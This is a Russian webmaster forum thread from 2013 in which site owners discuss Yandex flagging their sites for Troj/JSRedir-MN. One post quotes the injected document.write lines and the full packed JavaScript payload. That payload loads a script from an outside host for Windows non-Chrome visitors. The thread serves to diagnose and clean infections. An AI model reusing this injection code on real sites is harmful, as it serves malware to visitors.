Яндекс нашёл вирус Troj/JSRedir-MN

109

harold12

7 ноября 2013, 02:41

24154

Яндекс нашёл вирус Troj/JSRedir-MN.

Уважаемые форумчане, есть тут специалисты по безопасности, кто поможет найти код?

Создание уникальных сайтов по низким ценам на любые тематики. Быстро, недорого, качественно. Для заказа пишите в icq 456101310 или ЛС. Скайп - dmitrii.web@gmail.com

Q

71

q3wzeck

7 ноября 2013, 12:00

#1

Тоже обнаружил эту дрянь. Уже не первый раз. Началось примерно месяц назад. Причем "вирус" виден не постоянно, яша сам мне пишет об обнаружении вируса и через день-два пишет что вируса больше нет. DLE сайты 9.7-10.0

Сегодня смотрю - просад по трафу. И снова вирус..

1

Вирус Wordpress Упал трафик в Яндекс Автостратегия работает без конверсий

M1

69

medved1105

7 ноября 2013, 13:03

#2

с утра пинал программистов, ничего не нашли...

1

Q

71

q3wzeck

7 ноября 2013, 13:17

#3

Нашел подключенную левую js.

На одном сайте была залита в папку со скриптом картинок, на другом залили в uploads DLE сайта. Обе js назывались по-разному, но текст был одинаковым. Подключались они через файл engine/classes/js/jquery.js. В самом конце файла была строка: document.write("<scr"+"ipt src='/uploads/posts/2012-03/stal.js'><"+"/script>");

Текст подключенной js'ки:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b f(5){8(3.e&&3.d){6 g=3.d(\'h\')[0];6 4=3.e(\'j\');4.7(\'l\',\'i/k\');4.7(\'5\',5);g.w(4)}}b a(){6 2=c.m.t();8((2.9("u")==-1&&2.9("v")!=-1)&&c.s()){f("r://n.o.2/p.q")}}a();',33,33,'||ua|document|script_tag|src|var|setAttribute|if|indexOf|includeCounter|function|navigator|getElementsByTagName|createElement|includeJavascript|head_tag|head|text|script|javascript|type|userAgent|tekezaz|pp|counter|js|http|javaEnabled|toLowerCase|chrome|win|appendChild'.split('|'),0,{}))

Что делает код, кто может понять?

---------- Добавлено 07.11.2013 в 15:29 ----------

Докладываю далее. Найдена swf на тех же двух сайтах. В разных папках.

R

25

Ruxx

7 ноября 2013, 16:49

#4

такой же вирус выстрелил сегодня. не знаю где его искать

---------- Добавлено 07.11.2013 в 21:04 ----------

update: нашел swf в папке 2012/07. Залит был вчера.

Стоит 10.1 лицензия

V

0

vmoto

7 ноября 2013, 17:23

#5

Ох, таже беда и меня посетила, нашел 2 шелла, но погоду они не сделали

109

harold12

7 ноября 2013, 17:40

#6

Вот мой скрин:

Я нашел 2 файла js с включением в конце:

;document.write("<scr"+"ipt src='/media/system/js/turkey.js'><"+"/script>");

И поудалял несколько swf. Что теперь просто ждать, когда Яша свой тупой глюк исправит?

V

0

vmoto

7 ноября 2013, 17:48

#7

harold12, а как ты нашел эти файлы?

109

harold12

7 ноября 2013, 18:55

#8

vmoto:
harold12, а как ты нашел эти файлы?

в исходном коде, на тех страницах, которые яндекс указал смотрел подключенные яваскрипты.

D

14

Devata

7 ноября 2013, 18:59

#9

Всем привет, те же яйца, Яндекс нашёл на сайте вирус Troj/JSRedir-MN, покопался в инете, нашёл что-то про вредоносный код в joomla модуле AutsonSlideShow, а именно файл default.php который лежит в mod_AutsonSlideShow папка tmpl. Удаление помогло буквально на час, сегодня Яша опять кричит что у меня на сайте ЗППП. Есть идеи что делать?

109

harold12

7 ноября 2013, 19:01

#10

Devata:
Всем привет, те же яйца, Яндекс нашёл на сайте вирус Troj/JSRedir-MN, покопался в инете, нашёл что-то про вредоносный код в joomla модуле AutsonSlideShow, а именно файл default.php который лежит в mod_AutsonSlideShow папка tmpl. Удаление помогло буквально на час, сегодня Яша опять кричит что у меня на сайте ЗППП. Есть идеи что делать?

насчет слайдера mod_AutsonSlideShow я давно заметил. Все мои сайты, где был этот модуль года пол назад стали считаться зараженными, хотя раньше все Яндекс устраивало

Что делать, чтобы попасть в ответы Google Bard

Курс биткоина превысил $50 тысяч